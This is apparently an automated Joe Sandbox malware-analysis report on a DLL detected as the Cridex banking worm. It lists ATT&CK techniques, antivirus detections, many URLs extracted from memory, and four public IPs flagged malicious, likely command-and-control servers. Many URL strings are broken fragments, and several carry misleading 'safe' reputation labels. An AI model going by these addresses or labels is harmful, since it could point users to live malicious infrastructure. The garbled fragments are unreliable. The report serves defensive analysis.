                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Owner/User Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol13Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Network Configuration Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery23Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      SecuriteInfo.com.Variant.Razy.980776.19803.dll8%VirustotalBrowse
                      SecuriteInfo.com.Variant.Razy.980776.19803.dll18%ReversingLabsWin32.Worm.Cridex

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://192.46.210.220/ntrust0%Avira URL Cloudsafe
                      https://45.77.0.96:60%Avira URL Cloudsafe
                      https://45.77.0.96:6891/Zm0%Avira URL Cloudsafe
                      https://143.244.140.214:808/(0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/h:0%Avira URL Cloudsafe
                      https://192.46.210.220/Certification0%URL Reputationsafe
                      https://192.46.210.220/7.0.96:6891/Microsoft0%Avira URL Cloudsafe
                      https://143.244.140.214:808/Kqfu(0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/.0.96:6891/0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/oft0%Avira URL Cloudsafe
                      https://143.244.140.214:808/%0%Avira URL Cloudsafe
                      https://45.77.0.96/(60%Avira URL Cloudsafe
                      https://45.77.0.96:6891/r0%Avira URL Cloudsafe
                      https://143.244.140.214:808/oft0%URL Reputationsafe
                      https://143.244.140.214:808/N0%Avira URL Cloudsafe
                      https://192.46.210.220/#0%Avira URL Cloudsafe
                      https://192.46.210.220/$0%Avira URL Cloudsafe
                      https://143.244.140.214:808/P0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/.0.96:6891/Microsoft0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/k0%Avira URL Cloudsafe
                      https://192.46.210.220/7.0.96:6891/0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/ES0%Avira URL Cloudsafe
                      https://192.46.210.220/&0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/v0%Avira URL Cloudsafe
                      https://192.46.210.220//0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/140%Avira URL Cloudsafe
                      https://192.46.210.220/;0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/N0%Avira URL Cloudsafe
                      https://143.244.140.214/0%URL Reputationsafe
                      https://192.46.210.220/1-00%Avira URL Cloudsafe
                      https://143.244.140.214:808/My0%URL Reputationsafe
                      https://192.46.210.220/80%Avira URL Cloudsafe
                      https://185.56.219.47/0%URL Reputationsafe
                      https://192.46.210.220/C0%Avira URL Cloudsafe
                      https://1845.77.0.96:6891/0%Avira URL Cloudsafe
                      https://192.46.210.220/B0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/J0%Avira URL Cloudsafe
                      https://192.46.210.220/K0%Avira URL Cloudsafe
                      https://192.46.210.220/I0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/b0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/08/0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/e0%Avira URL Cloudsafe
                      https://192.46.210.220/P0%Avira URL Cloudsafe
                      https://143.244.140.214:808/0%URL Reputationsafe
                      https://185.56.219.47:8116/.0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/.0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/0%URL Reputationsafe
                      https://192.46.210.220/trust0%Avira URL Cloudsafe
                      https://192.46.210.220/W0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/20%Avira URL Cloudsafe
                      https://143.244.140.214/j0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/00%Avira URL Cloudsafe
                      https://185.56.219.47:8116/40%Avira URL Cloudsafe
                      https://45.77.0.96:6891/)0%Avira URL Cloudsafe
                      https://143.244.140.214:808/Ht_0%Avira URL Cloudsafe
                      https://143.244.140.214/r0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/B0%Avira URL Cloudsafe
                      https://192.46.210.220/g0%Avira URL Cloudsafe
                      https://192.46.210.220/aenh.dllltb0%Avira URL Cloudsafe
                      https://192.46.210.220/e0%Avira URL Cloudsafe
                      https://192.46.210.220/f0%Avira URL Cloudsafe
                      https://192.46.210.220/s0%Avira URL Cloudsafe
                      https://192.46.210.220/t0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/D0%Avira URL Cloudsafe
                      https://192.46.210.220/o0%Avira URL Cloudsafe
                      https://185.56.219.47/m0%Avira URL Cloudsafe
                      https://143.244.140.214:808/hy0%URL Reputationsafe
                      https://192.46.210.220/y0%Avira URL Cloudsafe
                      https://192.46.210.220/z0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/h90%Avira URL Cloudsafe
                      https://45.77.0.96:6891/h.dll90%Avira URL Cloudsafe
                      https://192.46.210.220/v0%Avira URL Cloudsafe
                      https://192.46.210.220/.0.96:6891/0%Avira URL Cloudsafe
                      https://192.46.210.220/~0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/0%URL Reputationsafe
                      https://45.77.0.96/0%URL Reputationsafe
                      https://45.77.0.96:6891/derR0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/l0%Avira URL Cloudsafe
                      https://18185.56.219.47:8116/~0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/v0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/h.dll0%Avira URL Cloudsafe
                      https://192.46.210.220/graphy0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/x0%Avira URL Cloudsafe
                      https://143.244.F0%Avira URL Cloudsafe
                      https://192.46.210.220/0%URL Reputationsafe
                      https://185.56.219.47:8116/soft0%Avira URL Cloudsafe
                      https://192.46.210.220/0Z0W10%Avira URL Cloudsafe
                      https://45.77.0.96:6891/der0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/ll0%Avira URL Cloudsafe
                      https://143.244.140.214:808/.140.214:808/0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/4.140.214:808/hy0%Avira URL Cloudsafe
                      https://45.77.0.96/J0%Avira URL Cloudsafe
                      https://143.244.140.214:808/l0%URL Reputationsafe
                      https://45.77.0.96:6891/graphy0%URL Reputationsafe
                      https://452.46.210.220/0%Avira URL Cloudsafe
                      https://192.46.210.220/ography0%URL Reputationsafe
                      https://143.244.140.214:808/C~g0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/Ps%0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/Microsoft0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://192.46.210.220/true
                      • URL Reputation: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://192.46.210.220/ntrustloaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://45.77.0.96:6loaddll32.exe, 00000000.00000003.749472778.0000000001150000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://45.77.0.96:6891/Zmloaddll32.exe, 00000000.00000003.505189315.0000000001151000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://143.244.140.214:808/(rundll32.exe, 00000004.00000003.740452821.00000000033D7000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://185.56.219.47:8116/h:rundll32.exe, 00000004.00000003.548484641.00000000033D7000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/Certificationrundll32.exe, 00000004.00000002.839402088.000000000343A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://192.46.210.220/7.0.96:6891/Microsoftloaddll32.exe, 00000000.00000003.692427615.000000000114C000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://143.244.140.214:808/Kqfu(loaddll32.exe, 00000000.00000003.491330486.00000000011B8000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://45.77.0.96:6891/.0.96:6891/loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://185.56.219.47:8116/oftrundll32.exe, 00000004.00000003.690111757.00000000033D7000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://143.244.140.214:808/%loaddll32.exe, 00000000.00000003.719411339.000000000114E000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://45.77.0.96/(6rundll32.exe, 00000004.00000003.732236260.000000000339C000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://45.77.0.96:6891/rloaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://143.244.140.214:808/oftloaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.825892438.0000000001143000.00000004.00000020.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://143.244.140.214:808/Nrundll32.exe, 00000004.00000003.454870700.00000000033DB000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/#loaddll32.exe, 00000000.00000003.802350875.000000000114C000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/$rundll32.exe, 00000004.00000003.732236260.000000000339C000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://143.244.140.214:808/Ploaddll32.exe, 00000000.00000003.608201796.000000000114A000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://45.77.0.96:6891/.0.96:6891/Microsoftloaddll32.exe, 00000000.00000003.547291056.0000000001150000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.774221370.0000000001150000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://45.77.0.96:6891/kloaddll32.exe, 00000000.00000003.608201796.000000000114A000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/7.0.96:6891/loaddll32.exe, 00000000.00000003.480245456.0000000001150000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://185.56.219.47:8116/ESloaddll32.exe, 00000000.00000003.491368237.0000000001150000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.768805563.00000000033D7000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.462417469.00000000033DB000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/&loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://45.77.0.96:6891/vrundll32.exe, 00000004.00000003.456375848.0000000003450000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220//loaddll32.exe, 00000000.00000003.480245456.0000000001150000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://45.77.0.96:6891/14loaddll32.exe, 00000000.00000003.512614801.0000000001157000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/;loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://45.77.0.96:6891/Nrundll32.exe, 00000004.00000003.456375848.0000000003450000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://143.244.140.214/rundll32.exe, 00000004.00000003.508875492.00000000033DB000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://192.46.210.220/1-0loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://143.244.140.214:808/Myrundll32.exe, 00000004.00000003.508875492.00000000033DB000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://192.46.210.220/8loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://185.56.219.47/rundll32.exe, 00000004.00000002.855490130.0000000005463000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://192.46.210.220/Cloaddll32.exe, 00000000.00000003.463671472.0000000001151000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://1845.77.0.96:6891/loaddll32.exe, 00000000.00000003.608201796.000000000114A000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      https://192.46.210.220/Bloaddll32.exe, 00000000.00000003.785545934.000000000114D000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://45.77.0.96:6891/Jloaddll32.exe, 00000000.00000003.608201796.000000000114A000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/Kloaddll32.exe, 00000000.00000003.603741779.0000000001150000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/Iloaddll32.exe, 00000000.00000003.785545934.000000000114D000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://45.77.0.96:6891/bloaddll32.exe, 00000000.00000003.491368237.0000000001150000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://45.77.0.96:6891/08/loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.833374830.00000000033D7000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://45.77.0.96:6891/eloaddll32.exe, 00000000.00000002.825892438.0000000001143000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/Ploaddll32.exe, 00000000.00000003.785545934.000000000114D000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://143.244.140.214:808/rundll32.exe, 00000004.00000003.508875492.00000000033DB000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://185.56.219.47:8116/.rundll32.exe, 00000004.00000003.715591427.0000000003441000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://45.77.0.96:6891/.loaddll32.exe, 00000000.00000003.684059514.0000000001150000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://45.77.0.96:6891/loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.719411339.000000000114E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.456386588.0000000005467000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.855490130.0000000005463000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://192.46.210.220/trustloaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/Wloaddll32.exe, 00000000.00000003.692427615.000000000114C000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://45.77.0.96:6891/2loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://143.244.140.214/jloaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://185.56.219.47:8116/0loaddll32.exe, 00000000.00000003.603741779.0000000001150000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://185.56.219.47:8116/4loaddll32.exe, 00000000.00000003.547291056.0000000001150000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://45.77.0.96:6891/)rundll32.exe, 00000004.00000003.456386588.0000000005467000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://143.244.140.214:808/Ht_loaddll32.exe, 00000000.00000003.491368237.0000000001150000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://143.244.140.214/rloaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://185.56.219.47:8116/Bloaddll32.exe, 00000000.00000003.583912455.000000000114E000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://192.46.210.220/gloaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://45.77.0.96:6891/Bloaddll32.exe, 00000000.00000003.719411339.000000000114E000.00000004.00000001.sdmpfalse
                        		unknown
                        https://192.46.210.220/aenh.dllltbloaddll32.exe, 00000000.00000003.779467941.000000000114C000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://192.46.210.220/erundll32.exe, 00000004.00000003.819391649.00000000033D7000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://192.46.210.220/floaddll32.exe, 00000000.00000003.779467941.000000000114C000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://192.46.210.220/sloaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.690111757.00000000033D7000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://192.46.210.220/tloaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://185.56.219.47:8116/Drundll32.exe, 00000004.00000003.601489285.00000000033D7000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://192.46.210.220/orundll32.exe, 00000004.00000003.498135306.00000000033DB000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://185.56.219.47/mloaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://143.244.140.214:808/hyloaddll32.exe, 00000000.00000003.749472778.0000000001150000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.547291056.0000000001150000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.719411339.000000000114E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.637891796.00000000033D7000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://192.46.210.220/yloaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://192.46.210.220/zloaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://45.77.0.96:6891/h9rundll32.exe, 00000004.00000003.508903560.0000000003450000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://45.77.0.96:6891/h.dll9loaddll32.exe, 00000000.00000003.459519197.0000000001158000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://192.46.210.220/vrundll32.exe, 00000004.00000003.515187644.0000000003450000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://192.46.210.220/.0.96:6891/loaddll32.exe, 00000000.00000002.825892438.0000000001143000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://192.46.210.220/~rundll32.exe, 00000004.00000003.707287574.0000000003440000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://185.56.219.47:8116/loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.785545934.000000000114D000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.690151454.0000000003440000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://45.77.0.96/loaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.459519197.0000000001158000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.732236260.000000000339C000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://45.77.0.96:6891/derRloaddll32.exe, 00000000.00000003.459519197.0000000001158000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://185.56.219.47:8116/lloaddll32.exe, 00000000.00000003.692427615.000000000114C000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.690151454.0000000003440000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://18185.56.219.47:8116/~loaddll32.exe, 00000000.00000003.480245456.0000000001150000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        https://185.56.219.47:8116/vrundll32.exe, 00000004.00000003.690151454.0000000003440000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://45.77.0.96:6891/h.dllloaddll32.exe, 00000000.00000002.825892438.0000000001143000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000003.456349641.0000000003414000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://192.46.210.220/graphyloaddll32.exe, 00000000.00000003.512614801.0000000001157000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://185.56.219.47:8116/xloaddll32.exe, 00000000.00000003.491368237.0000000001150000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://143.244.Floaddll32.exe, 00000000.00000003.583912455.000000000114E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://185.56.219.47:8116/softloaddll32.exe, 00000000.00000003.749472778.0000000001150000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.505189315.0000000001151000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.543841202.0000000001156000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.692427615.000000000114C000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.506581152.00000000033DB000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://192.46.210.220/0Z0W1loaddll32.exe, 00000000.00000003.491368237.0000000001150000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://45.77.0.96:6891/derloaddll32.exe, 00000000.00000003.608201796.000000000114A000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.825892438.0000000001143000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000003.456375848.0000000003450000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://185.56.219.47:8116/llrundll32.exe, 00000004.00000003.690151454.0000000003440000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://143.244.140.214:808/.140.214:808/loaddll32.exe, 00000000.00000003.608201796.000000000114A000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://185.56.219.47:8116/4.140.214:808/hyloaddll32.exe, 00000000.00000003.583912455.000000000114E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://45.77.0.96/Jloaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://143.244.140.214:808/lloaddll32.exe, 00000000.00000003.543841202.0000000001156000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.508875492.00000000033DB000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://45.77.0.96:6891/graphyloaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.719411339.000000000114E000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.825892438.0000000001143000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000002.855490130.0000000005463000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://452.46.210.220/rundll32.exe, 00000004.00000003.732236260.000000000339C000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        https://192.46.210.220/ographyloaddll32.exe, 00000000.00000003.806756501.000000000114F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.719411339.000000000114E000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.558714195.0000000001155000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.583912455.000000000114E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.855490130.0000000005463000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://143.244.140.214:808/C~grundll32.exe, 00000004.00000003.479096259.00000000033DB000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://185.56.219.47:8116/Ps%loaddll32.exe, 00000000.00000003.819035845.0000000001150000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.740542417.000000000339C000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://45.77.0.96:6891/Microsoftloaddll32.exe, 00000000.00000003.749472778.0000000001150000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.603741779.0000000001150000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.491368237.0000000001150000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.543841202.0000000001156000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.855490130.0000000005463000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        45.77.0.96
                        		unknownUnited States
                        		20473AS-CHOOPAUStrue
                        185.56.219.47
                        		unknownItaly
                        		202675KELIWEBITtrue
                        192.46.210.220
                        		unknownUnited States
                        		5501FRAUNHOFER-CLUSTER-BWResearchInstitutesspreadalloverGetrue
                        143.244.140.214
                        		unknownUnited States
                        		174COGENT-174UStrue

                        Private

                        IP
                        192.168.2.1

                        General Information

                        Joe Sandbox Version:33.0.0 White Diamond
                        Analysis ID:510692
                        Start date:28.10.2021
                        Start time:05:01:35
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 11m 46s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:SecuriteInfo.com.Variant.Razy.980776.19803.14094 (renamed file extension from 14094 to dll)
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:24
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal84.bank.troj.evad.winDLL@11/1@0/5
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 14% (good quality ratio 14%)
                        • Quality average: 79.2%
                        • Quality standard deviation: 15.7%
                        HCA Information:
                        • Successful, ratio: 64%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Override analysis time to 240s for rundll32
                        Warnings:
                        Show All
